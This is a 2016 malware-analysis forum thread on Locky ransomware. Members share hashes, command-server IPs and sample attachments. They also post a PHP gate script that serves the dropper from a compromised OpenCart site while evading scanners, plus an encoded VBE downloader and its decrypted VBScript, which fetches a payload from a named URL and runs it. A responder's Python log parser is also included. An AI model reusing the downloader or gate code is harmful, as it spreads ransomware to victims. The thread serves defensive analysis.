A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28170  by patriq
 Fri Apr 01, 2016 12:40 am
Sample from Distribution Site
https://ransomwaretracker.abuse.ch/host ... lebox.com/

https://www.virustotal.com/en/file/003d ... /analysis/

I'm seeing it POST to 185.75.46.4/submit.php now
https://ransomwaretracker.abuse.ch/ip/1 ... 5.75.46.4/
(listed as offline now?)

Ransom note: _HELP_instructions.gif
Payment: paymentscreenshot.png
Attachments (101.23 KiB)
 #28276  by rkhunter
 Mon Apr 11, 2016 10:51 am
Locky ransomware, TeslaCrypt & other malware families use new tool to evade detection

http://researchcenter.paloaltonetworks. ... detection/

Locky sample attached.
SHA-256: 4b9a525a80cdba0d827b52d1e19c0b74e055b9afacfa2910dd32230826f91a7a
Attachments (99.84 KiB), pass: infected
 #28301  by benkow_
 Wed Apr 13, 2016 1:27 pm
Example of a script used to spread Locky (hosted on a compromised OpenCart site, with URL pattern: XXX.com/image/flags/.../40X.php?f=XXX)
Code:
<?php
error_reporting(0);
$file = isset($_GET['f']) ? $_GET['f'] : "";
 
if (file_exists($file)) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $geoPlugin_array = unserialize( file_get_contents('http://www.geoplugin.net/php.gp?ip=' . $ip) );
    $c_name = $geoPlugin_array['geoplugin_countryName'];
    $c_code = $geoPlugin_array['geoplugin_countryCode'];
 
    if (0 === strpos($c_code, "CN")) exit;
    if (0 === strlen($ua)) exit;
    if (strpos(file_get_contents($file.".stats_ip.txt"), "IP:".$ip) !== false) exit;
    if (0 === strpos($ip, "173.245.81.")) exit;
    if (false !== strpos($ua, "virustotal")) exit;
 
    file_put_contents($file.".stats.txt", "DATE:".date("Y-m-d H:i:s")."\tIP:".$ip."\tCOUNTRY:(".$c_code.")".$c_name."\tUA:".$ua."\tREF:".$_SERVER['HTTP_REFERER']."\n", FILE_APPEND);
    file_put_contents($file.".stats_ip.txt", "IP:".$ip."\n", FILE_APPEND);
 
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}
exit;
?>
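The gate above logs one line per delivered payload in the exact layout of its file_put_contents() call, so a responder who finds such a script on a compromised OpenCart host can recover which clients were actually served the dropper. The following is an added example (not from the post or from the script's authors) that parses that ".stats.txt" format and cross-checks it against the ".stats_ip.txt" dedup list; the sample log lines, IPs, user agents and referer are constructed.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample of the ".stats.txt" file the gate above appends to, in the
# exact layout of its file_put_contents() call. IPs are documentation ranges
# and the UA/referer strings are made up; the fourth line is deliberately
# malformed to exercise the parser's error handling.
SAMPLE_STATS = (
    "DATE:2016-04-13 09:12:41\tIP:198.51.100.23\tCOUNTRY:(DE)Germany"
    "\tUA:Mozilla/5.0 (Windows NT 6.1; WOW64)\tREF:\n"
    "DATE:2016-04-13 09:15:02\tIP:203.0.113.7\tCOUNTRY:(US)United States"
    "\tUA:Mozilla/4.0 (compatible; MSIE 7.0)\tREF:http://example.invalid/landing\n"
    "DATE:2016-04-13 11:40:19\tIP:192.0.2.55\tCOUNTRY:(US)United States"
    "\tUA:Mozilla/5.0 (Windows NT 10.0)\tREF:\n"
    "this line is not a gate record\n"
)
# Constructed ".stats_ip.txt" companion file (the gate's dedup list); one IP
# from the log above is deliberately absent.
SAMPLE_IPS = "IP:198.51.100.23\nIP:203.0.113.7\n"

LINE_RE = re.compile(
    r"^DATE:(?P<date>[^\t]*)\tIP:(?P<ip>[^\t]*)\tCOUNTRY:\((?P<cc>[^)]*)\)"
    r"(?P<country>[^\t]*)\tUA:(?P<ua>[^\t]*)\tREF:(?P<ref>.*)$"
)

def parse_stats(text):
    """One dict per well-formed record; lines that do not fit the layout are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        rec = m.groupdict()
        rec["date"] = datetime.strptime(rec["date"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records

def summarize(records):
    """Each record is one delivered payload: the gate logs only after all its filters pass."""
    dates = [r["date"] for r in records]
    return {
        "deliveries": len(records),
        "victim_ips": sorted({r["ip"] for r in records}),
        "by_country": dict(Counter(r["cc"] for r in records)),
        "first_seen": min(dates) if dates else None,
        "last_seen": max(dates) if dates else None,
    }

def ips_missing_from_dedup(records, ip_list_text):
    """IPs served per .stats.txt but absent from .stats_ip.txt: a hint that one file was truncated or edited."""
    seen = {l[3:] for l in ip_list_text.splitlines() if l.startswith("IP:")}
    return sorted({r["ip"] for r in records} - seen)
```

Because the gate exits before logging for repeat IPs, Cloudflare-range IPs, empty user agents and "virustotal" scanners, the log under-counts visits but not deliveries; treat every listed IP as a host that received the dropper.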
 #28435  by Antelox
 Fri Apr 29, 2016 1:10 pm
Found inside Locky JS Downloader! =)
inside_locky_js_downloader.jpg
BR,

Antelox
 #28486  by frank_boldewin
 Wed May 11, 2016 7:39 pm
Just analysed a new way Locky tries to install on systems. Very small zip files (<1000 bytes); after unzipping there's a RAR file, and inside that a .vbe (encrypted .vbs file).
The .vbs file tries to download and run a Locky dropper.

Several AV scanners suck at detecting this.

Encrypted .vbe file
Code:
'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==@#@&L4Tq~|SkN,xPrtOYa)&&mxYb5E/O(r8VR1WhzA2 kUm^;N/&^DYrWbmCYdJ.{GLREJ@#@&URkAAA==^#~@ 
'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==@#@&tn_KGs9_.mdP{PEyX6^a.my$dNm/RarWJ,@#@&joL4-kl4N6VfG\~x,ZDnCD+64Nn1YcrUmDbwD ?4+sVr# 3Xwl	[2	\kMGU:xD?ODrUT/cJuO+swYE*@#@&ioNt-/m490VGf7P',jw%t7/Ct90V9G\PL~J'J@#@&[r:,x	|$1F^m/lPUnY,xUF~1|^CkPxP1.lOW(L+1YvEHbm.WkWWOc(HduK:nJ*@#@&Nb:,m^Mo9_?9m1d),?nO,mm!oGCjf1^kPx,mM+lD+K8LmO`rb[G94RUODl:rb@#@&	xnAH|^CkR6wUPrM3Pr~P%4Tq$|dd9~~wl^/+@#@&	U|~1Fmm/ jxN@#@&hbYt,^^Mwf_?9m^d@#@&~P,~RDX2n,'Pq~@#@&~P,~cW2x@#@&P,P, hMkO+,xUF~1|1C/cD+k2Gxk+~W[X@#@&,P~Pcdl7+OG6kVn~`s%t7dmt[63Gf\,[,~tCPfw9u#m/~,+P@#@&+	[~hbY4@#@&?nO,t[KIojkl[[1P'~/M+CY6(Ln1YvJ?4+^sRzw2VbmCObWxrbP@#@&t9Pes`/mN[m 6a+UP`oL4\dC4N0V9G\~[,4CPGsxC.m/@#@&E7sAAA==^#~@ 
Decrypted:
Code:
jhgIBKLsd = "http://antiques-bible.com/wp-includes/certificates/V7Dj8u"

heHTDFJHVas = "zxxcxzczqsdas.pif"
UFjhvsahdfkDDv = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
UFjhvsahdfkDDv = UFjhvsahdfkDDv & "\"
dim nnKBNKcas: Set nnKBNKcas = createobject("Microsoft.XMLHTTP")
dim ccGFDHSDccs: Set ccGFDHSDccs = createobject("Adodb.Stream")
nnKBNKcas.Open "GET", jhgIBKLsd, False
nnKBNKcas.Send
with ccGFDHSDccs
    .type = 1
    .open
    .write nnKBNKcas.responseBody
    .savetofile UFjhvsahdfkDDv &  heHTDFJHVas, 2
end with
Set hdTYFUsaddc = CreateObject("Shell.Application")
hdTYFUsaddc.Open UFjhvsahdfkDDv & heHTDFJHVas
Dropper attached!
Attachments (181.46 KiB), pw: malware